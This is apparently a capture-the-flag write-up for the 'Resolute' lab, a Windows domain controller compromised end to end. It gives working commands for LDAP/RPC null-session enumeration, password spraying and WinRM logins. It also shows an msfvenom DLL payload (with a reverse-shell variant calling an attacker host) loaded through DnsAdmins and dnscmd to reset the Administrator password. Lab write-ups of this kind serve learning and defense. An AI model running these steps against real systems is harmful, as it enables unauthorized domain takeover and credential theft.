Machine Synopsis#
Resolute is an easy difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM. (Source)
Key exploitation techniques:
- Active Directory anonymous LDAP bind for information disclosure
- Password spray for valid credentials
- WinRM for initial user access
- PowerShell transcript log analysis for credential discovery
- Lateral movement
DnsAdminsgroup abuse for arbitrary DLL loading and RCE
Enumeration#
❯ nmap -p- --min-rate 10000 10.10.10.169
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
49688/tcp open unknown
49713/tcp open unknown
63433/tcp open unknown
❯ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49688,49713,63433 -sC -sV 10.10.10.169
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-06 01:49:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
63433/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
The scan identified a Windows Domain Controller (RESOLUTE) running Active Directory services. megabank.local was added to /etc/hosts.
❯ echo -e '10.10.10.169\tmegabank.local' | sudo tee -a /etc/hosts
rpcclient was used with a null session to enumerate domain users, revealing a list of potential usernames.
❯ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
...
user:[marko] rid:[0x457]
...
rpcclient $> queryuser marko
User Name : marko
Full Name : Marko Novak
...
Description : Account created. Password set to Welcome123!
...
The queryuser marko command revealed a password hint in the description: Welcome123!. Although marko’s account was no longer using this password, it was a strong candidate for password spraying.
All enumerated users were saved to users.txt. kerbrute was used to validate these users.
❯ kerbrute -domain megabank.local -users users.txt -dc-ip 10.10.10.169
...
[*] Valid user => Administrator
...
[*] Valid user => ryan
...
[*] Valid user => melanie
...
impacket-GetNPUsers was used to check for users with UF_DONT_REQUIRE_PREAUTH set, but none were found.
Exploitation#
Password Spray & Initial Access (melanie)#
A password spray was performed using nxc with the discovered password Welcome123! against the list of valid users.
❯ nxc smb megabank.local -u users.txt -p Welcome123! --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
...
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
The password Welcome123! was valid for melanie. evil-winrm was used to gain a shell as melanie.
❯ evil-winrm -i 10.10.10.169 -P 5985 -u melanie -p 'Welcome123!'
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
1c3161947f44efe99fc0caf2175edcf5
The user.txt flag was retrieved.
Privilege Escalation#
PowerShell Transcript Log & Lateral Movement (ryan)#
Enumeration of users in C:\Users\ revealed ryan.
*Evil-WinRM* PS C:\Users\melanie\Desktop> cd C:\Users
*Evil-WinRM* PS C:\Users> ls
...
d----- 9/27/2019 7:05 AM ryan
...
A hidden directory PSTranscripts was found in C:\ using dir -force. This directory contained PowerShell transcript logs.
*Evil-WinRM* PS C:\Users> cd C:\
*Evil-WinRM* PS C:\> dir -force
...
d--h-- 12/3/2019 6:32 AM PSTranscripts
...
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
The PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt file was downloaded and reviewed. It contained a command with plaintext credentials.
❯ cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
...
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
...
The password for ryan was Serv3r4Admin4cc123!. Lateral movement to ryan was achieved via evil-winrm.
❯ evil-winrm -i 10.10.10.169 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'
On ryan’s desktop, note.txt indicated a 1-minute auto-revert for system changes (excluding administrator account changes).
*Evil-WinRM* PS C:\Users\ryan\desktop> type note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
whoami /groups revealed ryan was a member of the DnsAdmins group.
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups
GROUP INFORMATION
-----------------
...
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
...
DnsAdmins Group Abuse (SYSTEM)#
Membership in the DnsAdmins group allows an attacker to load an arbitrary DLL into the DNS Server service, which runs as NT AUTHORITY\SYSTEM. This is a common privilege escalation vector.
A malicious DLL payload was generated using msfvenom to reset the Administrator password.
❯ msfvenom -p windows/x64/exec cmd='net user administrator P@ssw0rd /domain' -f dll > hehe.dll
(Alternatively, for a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.xx.xx LPORT=443 -f dll -o rev.dll)
An SMB server was set up on the attacking machine to host the malicious DLL.
❯ impacket-smbserver share ./
From the ryan shell, the DNS settings were modified using dnscmd to load the malicious DLL upon service restart.
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd 127.0.0.1 /config /serverlevelplugindll \\10.10.16.4\share\hehe.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
The DNS service was then manually stopped and started to trigger DLL loading.
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
...
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
...
The Administrator password was successfully reset to P@ssw0rd. Final login as Administrator via evil-winrm confirmed full system compromise.
❯ evil-winrm -i 10.10.10.169 -P 5985 -u administrator -p 'P@ssw0rd'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
60d344a054c92723949cf2b4c775449c